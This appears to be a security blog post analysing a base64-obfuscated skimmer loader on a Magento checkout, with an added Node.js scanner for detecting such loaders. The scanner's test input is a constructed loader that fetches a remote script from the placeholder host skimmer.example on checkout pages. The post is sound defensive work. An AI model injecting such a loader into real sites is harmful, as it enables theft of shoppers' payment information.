Our team recently came across a malicious script, which we refer to as gstaticapi, on a Magento website. The script targeted the checkout process to capture and exfiltrate stolen payment information.
As seen above, the first if statement looks for the checkout string in the URL using window.location.href.indexOf. The string itself is never written in plain text: when decoded, the base64 string “Y2hlY2tvdXQ=” equates to “checkout”.
The code then creates a script element whose script.src is set to the decoded value of another base64 string, which equates to gstaticapi[.]com/gs.js.
While the script consists of only five lines, it can be collapsed into a single line to make it more difficult to spot. And unless you know exactly which strings to look for, a search of the site's files for any associated domains will come up empty, since they are all encoded.
To detect these types of injections, your best bet is to leverage a website monitoring service that can detect changes both externally (in the rendered pages) and at the server level (in the files themselves).
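As an added example (not code from the original post), the following Node.js scanner applies the observation above: it pulls quoted base64 literals out of a JavaScript file, decodes them, and flags any that decode to the word checkout or to a URL or hostname. The sample loader it scans is constructed here, with the placeholder domain skimmer.example standing in for the real one.

```javascript
// Added example: a defender-side scanner for base64-hidden strings in JS.
// Quoted literals of 8+ base64 characters, optionally padded with "=".
const BASE64_LITERAL = /["']([A-Za-z0-9+/]{8,}={0,2})["']/g;
// Something that looks like a URL or bare hostname, e.g. "https://x.example/gs.js".
const HOST_LIKE = /^(https?:)?\/?\/?[a-z0-9.-]+\.[a-z]{2,}(\/|$)/i;
const PRINTABLE = /^[\x20-\x7e]+$/;

// Decode a candidate literal; return null unless it round-trips cleanly to
// printable text, which filters out ordinary identifiers that merely look like base64.
function decodeBase64(literal) {
  const decoded = Buffer.from(literal, "base64").toString("utf8");
  const roundTrip = Buffer.from(decoded, "utf8").toString("base64");
  if (roundTrip.replace(/=+$/, "") !== literal.replace(/=+$/, "")) return null;
  return PRINTABLE.test(decoded) ? decoded : null;
}

// Scan a script's source text; return one finding per suspicious literal.
function scanScript(source) {
  const findings = [];
  for (const match of source.matchAll(BASE64_LITERAL)) {
    const literal = match[1];
    const decoded = decodeBase64(literal);
    if (decoded === null) continue;
    if (decoded.toLowerCase().includes("checkout")) {
      findings.push({ literal, decoded, reason: "decodes to checkout keyword" });
    } else if (HOST_LIKE.test(decoded)) {
      findings.push({ literal, decoded, reason: "decodes to remote URL or hostname" });
    }
  }
  return findings;
}

// Constructed sample: a loader shaped like the one described in the post.
// The URL is encoded here so the placeholder domain stays readable in source.
const SAMPLE_URL = "https://skimmer.example/gs.js"; // placeholder, not a real indicator
const SAMPLE_LOADER = `if (window.location.href.indexOf(atob("Y2hlY2tvdXQ=")) > -1) {
  var script = document.createElement("script");
  script.src = atob("${Buffer.from(SAMPLE_URL).toString("base64")}");
  document.head.appendChild(script);
}`;

console.log(JSON.stringify(scanScript(SAMPLE_LOADER), null, 2));
```

Run against a real file with `scanScript(fs.readFileSync(path, "utf8"))`; the same check works on a single collapsed line, since it keys on the literals rather than on line structure.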